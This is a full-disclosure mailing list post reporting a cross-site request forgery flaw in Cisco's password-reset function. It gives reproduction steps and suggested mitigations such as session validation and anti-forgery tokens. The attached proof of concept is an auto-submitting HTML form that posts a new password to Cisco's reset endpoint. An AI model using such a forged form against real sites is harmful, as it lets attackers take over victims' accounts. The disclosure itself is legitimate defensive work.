[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Security Vulnerability : Cisco web site CSRF in change password lead to full account take over
From: mohamed sayed <eng.mohamed8860 () gmail ! com>
Date: 2016-10-24 6:49:34
Message-ID: CABTCCWJ__0oG1pyRhmhd5bBGc1SkF=7r0z8j_T8qkzs-pX+TeQ () mail ! gmail ! com
[Download RAW message or body]
Dear Team ,
Hope this email finds you well , Please be informed that i found a Major
Security vulnerability in the Main Cisco Web Site https://www.cisco.com/
*Introduction*
The vulnerability allows a remote hacker to force Victim`s browser to send
reset password for their accounts and then the Hacker will be able to take
the ownership of this account.
----------------------
*Description and Steps To reproduce the issue *
1-Go to Main Cisco web site and create a new Account
2-Click on forget password and then enter your email
3-An email address will be sent to your Inbox...click the link to reset
your password
4-After capturing the request (attached) found that it was Sent with a
session token to open the Web page
but with the Confirmation - Sending Email , this session Token didn`t sent
plus there is no Authorization code or anti forgery tokens !
*this lead to CSRF Vulnerability in the back end side *
5-By writing very simple POC script to simulate this request ...the hacker
will be able to change password of the registered/Loggedin victims in Cisco Web
application.
and by knowing his email he will be able to take his account easily !
------------------------
*Mitigation*
i`m suggesting the following solution to solve this issue :
1-In *post* reset password action : the request should contains the Session
token or authorization code and the back end side should validate that this
session is valid
2-Anti Forgery token should be added to the request parameters .
-------------------
Attached Screen shots and Simple POC (CISCO_ACCOUNT_OWNERSHIPT_CSRF.html)
to represent the issue.
if there is any thing not clear , please let me know
Looking forward to read from you soon :)
Regards
["CISCO_ACCOUNT_OWNERSHIP_CSRF (1).html" (text/html)]
<form id="f1" action="https://tools.cisco.com/IDPSWD/passwordResetSubmitAction.do" method="post">
<input type="hidden" name="user" value="guest"/>
<input type="hidden" name="pwdForm.newPwd" value="Ahmed_887203243"/>
<input type="hidden" name="pwdForm.reTypePwd" value="Ahmed_887203243"/>
</form>
<script type="text/javascript">
document.forms["f1"].submit();
</script>
["reset_password_1.jpg" (image/jpeg)]
["reset_password_2.jpg" (image/jpeg)]
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic